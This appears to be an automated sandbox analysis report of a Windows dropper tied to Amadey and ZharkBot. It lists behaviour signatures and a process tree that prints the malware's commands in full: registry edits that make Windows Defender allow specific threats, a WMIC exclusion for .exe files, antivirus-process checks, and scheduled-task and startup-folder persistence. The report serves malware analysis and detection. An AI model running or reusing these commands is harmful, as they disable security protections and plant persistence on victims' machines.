Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    31-08-2024 16:19

General

  • Target

    9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951.exe

  • Size

    425KB

  • MD5

    ced97d60021d4a0bfa03ee14ec384c12

  • SHA1

    7af327df2a2d1e0e09034c2bdf6a47f788cec4e4

  • SHA256

    9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951

  • SHA512

    af0a02daa759010a1edfc78f14c5fe321c10802d0b9df55b515fe501114af0835a05bbd5dd5e2167b4b1f39bb6da787343bf9141d5f811113f71749741b47811

  • SSDEEP

    6144:31YnIct+B6NxMYE4+Sx9SY5pkUM7LOM/9HtlcyKZrr02e7wufA5oVt1ZuWu1KBF/:0IGxJECSYCLTxKZn1e7C5oVnZuWu3p

Malware Config

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • ZharkBot

    ZharkBot is a botnet written C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 10 IoCs
  • Indirect Command Execution 1 TTPs 11 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 6 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 61 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3368
      • C:\Users\Admin\AppData\Local\Temp\9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951.exe
        "C:\Users\Admin\AppData\Local\Temp\9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1704
        • C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe
          "C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          PID:1744
        • C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
          "C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:644
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3708
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              5⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:3648
            • C:\Windows\SysWOW64\findstr.exe
              findstr /I "wrsa opssvc"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1732
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3004
            • C:\Windows\SysWOW64\findstr.exe
              findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
              5⤵
                PID:5040
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c md 684126
                5⤵
                  PID:3028
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "VegetablesIndividualBindingGba" Ever
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1208
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:8
                • C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif
                  Intake.pif C
                  5⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:960
                  • C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                    C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                    6⤵
                    • Executes dropped EXE
                    PID:1644
                  • C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                    C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                    6⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:988
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 5
                  5⤵
                    PID:4960
              • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
                "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3832
                • C:\Users\Admin\AppData\Local\Temp\7zS113C.tmp\Install.exe
                  .\Install.exe
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1876
                  • C:\Users\Admin\AppData\Local\Temp\7zS136F.tmp\Install.exe
                    .\Install.exe /kHdidM "385107" /S
                    5⤵
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Enumerates system info in registry
                    • Suspicious use of WriteProcessMemory
                    PID:4772
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:3856
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        7⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:332
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:3428
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:1452
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                        7⤵
                        • Indirect Command Execution
                        PID:2964
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          8⤵
                            PID:4372
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:1636
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                          7⤵
                          • Indirect Command Execution
                          PID:3932
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2848
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              9⤵
                                PID:3000
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                            7⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:4728
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              8⤵
                                PID:2068
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                  9⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1104
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                              7⤵
                              • Indirect Command Execution
                              • System Location Discovery: System Language Discovery
                              PID:3424
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                8⤵
                                  PID:5032
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    9⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4104
                                    • C:\Windows\SysWOW64\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      10⤵
                                        PID:4124
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                6⤵
                                • Indirect Command Execution
                                PID:4316
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1852
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    8⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1556
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                      9⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2332
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "bISIDNXXYteSJEZXLD" /SC once /ST 16:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS136F.tmp\Install.exe\" W7 /SawndidINQ 385107 /S" /V1 /F
                                6⤵
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:2244
                        • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:4648
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 508
                            4⤵
                            • Program crash
                            PID:5012
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
                        2⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:2380
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1368
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
                        2⤵
                        • Drops startup file
                        PID:4256
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4648 -ip 4648
                      1⤵
                        PID:1028
                      • C:\Users\Admin\AppData\Local\Temp\7zS136F.tmp\Install.exe
                        C:\Users\Admin\AppData\Local\Temp\7zS136F.tmp\Install.exe W7 /SawndidINQ 385107 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Modifies data under HKEY_USERS
                        PID:2668
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1608
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                            3⤵
                            • Indirect Command Execution
                            PID:3828
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              4⤵
                                PID:1592
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  5⤵
                                    PID:1776
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                3⤵
                                • Indirect Command Execution
                                PID:1768
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3248
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4392
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                3⤵
                                • Indirect Command Execution
                                PID:4200
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:732
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    5⤵
                                      PID:704
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                  3⤵
                                  • Indirect Command Execution
                                  PID:3660
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1924
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      5⤵
                                        PID:1060
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    3⤵
                                    • Indirect Command Execution
                                    PID:1208
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2760
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • System Location Discovery: System Language Discovery
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2764
                                        • C:\Windows\SysWOW64\gpupdate.exe
                                          "C:\Windows\system32\gpupdate.exe" /force
                                          6⤵
                                            PID:1904
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                    2⤵
                                    • Drops file in System32 directory
                                    • System Location Discovery: System Language Discovery
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1360
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4812
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                        4⤵
                                          PID:1296
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1732
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1580
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:3420
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:112
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:1392
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3628
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3608
                                            • C:\Windows\SysWOW64\reg.exe
